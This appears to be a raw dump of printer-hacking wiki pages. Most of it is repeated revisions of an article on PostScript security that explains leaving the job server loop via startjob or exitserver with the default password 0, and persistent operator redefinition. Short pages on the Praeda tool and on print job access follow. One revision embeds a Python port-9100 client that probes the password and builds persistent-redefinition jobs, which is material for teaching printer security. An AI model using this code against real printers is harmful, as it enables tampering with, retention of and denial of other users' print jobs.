be misleading though, as PostScript is capable of much more than just creating vector graphics. 
PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetic, stack and graphics manipulation and various data types such as arrays or dictionaries. Technically speaking, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers became networked, and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host, such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents.

Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication between host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below:

<syntaxhighlight lang=postscript>
%!
(Hello world) print
</syntaxhighlight>

While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop.

PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]].
== Security features ==

=== Exiting the server loop ===

The conventional model of a PostScript interpreter in a printer is a ‘print server’: a single-threaded process that consumes and executes a sequence of print jobs, each of which is a complete, independent PostScript program. Normally, each print job is therefore encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature:

<syntaxhighlight lang=postscript>
true 0 startjob
</syntaxhighlight>

or ''exitserver'' (available in all implementations that include a job server):

<syntaxhighlight lang=postscript>
serverdict begin 0 exitserver
</syntaxhighlight>

In both cases the <code>0</code> operand is the password. This capability is protected by the ''StartJobPassword'' system parameter, which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. In other words, a print job can access and alter further jobs. Bingo!

=== Operator redefinition ===

When a PostScript document calls an operator, the first definition found on the dictionary stack is used. Operators normally reside in the ''systemdict'' dictionary; by placing a new definition under the same name into ''userdict'', which is searched before ''systemdict'', an operator can effectively be overwritten. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted.
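The following Python client is an added example; it is not code from this wiki, from PRET or from PFT. It ties the bidirectional raw port 9100 channel described above to the two sections just explained: ''wrap_job'' appends an echo of a delimiter so the client knows when the interpreter has finished, ''probe_startjob'' reports whether ''startjob'' accepts a given ''StartJobPassword'' (the check to run after changing the password away from the default of 0), and ''persistent_redefinition'' builds a job that leaves the server loop and shadows an operator in ''userdict''. Assumed, not taken from the page: the delimiter string, all function names, and the loopback ''fake_printer'' used so the example runs without a printer; it does not interpret PostScript and only returns a canned reply.

```python
"""Raw port 9100 PostScript client with a loopback stand-in for offline runs.

Added example, not code from the Hacking Printers wiki, PRET or PFT. Assumption
(ours): the target interprets PostScript received on TCP 9100 and writes the
output of `print` back on the same connection. DELIMITER, the function names and
the fake printer are constructed for this example.
"""
import re
import socket
import threading

DELIMITER = "@@END_OF_JOB@@"  # constructed end marker; any string absent from real output works


def wrap_job(body: str) -> bytes:
    """Prefix the %! magic number and append an echo of DELIMITER, so the client can
    tell when the interpreter has finished the job instead of waiting for a timeout."""
    return f"%!\n{body}\n({DELIMITER}) print flush\n".encode("latin-1")


def probe_startjob(password: str = "0") -> str:
    """PostScript that reports whether the job server loop can be left with `password`.
    Per the PLRM, startjob pushes true when the password is accepted (the rest of the
    file then runs unencapsulated) and false otherwise, so the printed line tells us
    whether the factory default of 0 is still in place."""
    return (f"true {password} startjob\n"
            "{(server loop exited: StartJobPassword accepted) print}\n"
            "{(still encapsulated: password rejected) print} ifelse")


def persistent_redefinition(operator: str, ps_body: str, level1: bool = False) -> str:
    """Job that leaves the server loop and installs `ps_body` as `operator` in userdict.
    userdict is searched before systemdict, so every later job calling `operator` runs
    this definition until the printer is restarted. `level1` selects the exitserver
    idiom instead of the Level 2 startjob operator."""
    if not re.fullmatch(r"[A-Za-z][A-Za-z0-9]*", operator):  # keep the name a plain PostScript name
        raise ValueError(f"not a plain PostScript name: {operator!r}")
    escape = ("serverdict begin 0 exitserver" if level1
              else "true 0 startjob not {(startjob rejected, definition is job-local) print} if")
    return f"{escape}\nuserdict /{operator} {{ {ps_body} }} put"


def parse_response(raw: bytes) -> str:
    """Return the interpreter's output up to DELIMITER. A missing delimiter means the job
    never reached its end (PostScript error, blocked interpreter), which is an error
    condition rather than an empty answer, so it is raised instead of returning ''."""
    text = raw.decode("latin-1")
    head, sep, _ = text.partition(DELIMITER)
    if not sep:
        raise RuntimeError(f"no delimiter in output, job did not complete: {text[:200]!r}")
    return head.strip()


def send_job(host: str, body: str, port: int = 9100, timeout: float = 5.0) -> str:
    """Send one PostScript job over raw port 9100 and collect output until DELIMITER."""
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(wrap_job(body))
        while DELIMITER.encode("latin-1") not in buf:
            chunk = sock.recv(4096)
            if not chunk:          # peer closed before the delimiter: parse_response reports it
                break
            buf += chunk
    return parse_response(buf)


def fake_printer(reply: str) -> int:
    """Constructed stand-in for the offline test: accepts one connection, drains the job
    up to its final `flush`, answers with `reply` followed by the delimiter echo and
    returns the loopback port it listens on. It does not interpret PostScript."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            data = b""
            while b"flush" not in data:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                data += chunk
            conn.sendall(f"{reply}{DELIMITER}\n".encode("latin-1"))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    # Loopback demo; point send_job at a printer's address (default port 9100) for a real probe.
    port = fake_printer("server loop exited: StartJobPassword accepted")
    print(send_job("127.0.0.1", probe_startjob(), port=port))
```

Run as-is for the loopback demonstration; replace the host and drop the ''port'' argument to probe a real printer. A job that hits a PostScript error never reaches the delimiter echo, which is why ''parse_response'' raises rather than returning an empty string: silence from the interpreter must not be mistaken for a rejected password.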
A scheme of the PostScript dictionary stack is given below:

[[File:Dictstack.png|300px|The PostScript dictionary stack]]

The potential impact of redefining operators is limited only by creativity. When further legitimate documents are printed and call a redefined operator, the attacker's version is executed. This can lead to various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note, however, that this is not necessarily a security bug but a 32-year-old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP].

→ ''Related articles:'' [[Fundamentals#Page Description Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]]

<!-- what about Configurable PostScript Interpreter (CPSI) technology? -->
The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. 
PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === Normally, each print job is encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. In other words, a print job can access and alter further jobs. Bingo! === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. 
Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 2632d0b5ba8b3ff0b926970daea3b9a0e7c05244 208 207 2017-01-23T16:34:39Z Admin 1 /* Exiting the server loop */ wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. 
It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. 
Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === Normally, each print job is encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). 
Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. In other words, a print job can access and alter further jobs. Bingo! === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? 
--> ----- 92c2bdb9c659f442d4cd58313ad1c3f0d14e3747 207 206 2017-01-23T16:31:07Z Admin 1 /* Exiting the server loop */ wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. 
In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === Normally, each print job is encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). 
Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? 
--> ----- 64c2c95e49ba4b008951f79e4f4887f86aa58f8c 206 205 2017-01-23T16:22:28Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. 
In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === <!-- when running in a printer is that the separtion of print ... can be bypassed ‘The conventional model of a PostScript interpreter is a “print server” — a single-threaded process that consumes and executes a sequence of “print jobs”, each of which is a complete, independent PostScript program. --> One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. 
To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. 
Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 01954905aefae2fefb06de832b5cd21e158f2c1a 205 204 2017-01-23T16:20:45Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. 
Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === <!-- when running in a printer is that the separtion of print ... can be bypassed ‘The conventional model of a PostScript interpreter is a “print server” — a single-threaded process that consumes and executes a sequence of “print jobs”, each of which is a complete, independent PostScript program. 
--> One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop by using exitserver will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. 
When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- f07d8c235822dba40a155bc4724b24faec6b2c21 204 203 2017-01-23T16:20:09Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. 
Praeda (revision 97 by 134.147.128.156, 2017-01-10T17:39:13Z)

Praeda is an ‘automated printer data harvesting tool’ written in Perl. It was developed to better understand the risks associated with multi-function printers and to help penetration testers gather usable data during a security assessment. Praeda consists of several modules that exploit weaknesses in various printer models. It systematically collects sensitive information from the printer's embedded web server. Besides exploiting vulnerabilities that lead to the disclosure of device passwords, the tool gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used in further network penetration tests.

== External links ==
* [http://h.foofus.net/?page_id=218 Official website]
Print job access (revision 327 by Admin, 2017-01-31T15:36:35Z)

The most valuable data found on printers is the print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high security environments with encrypted hard disks and network traffic, printers might be the '''weakest link''' in the security chain.

''Currently, the following print job access categories are discussed in this wiki:''
* [[Print job retention]] – Obtaining documents printed by other users (the ultimate goal in printer hacking)
* [[Print job manipulation]] – Editing documents printed by other users (overlay graphics and further pranks)
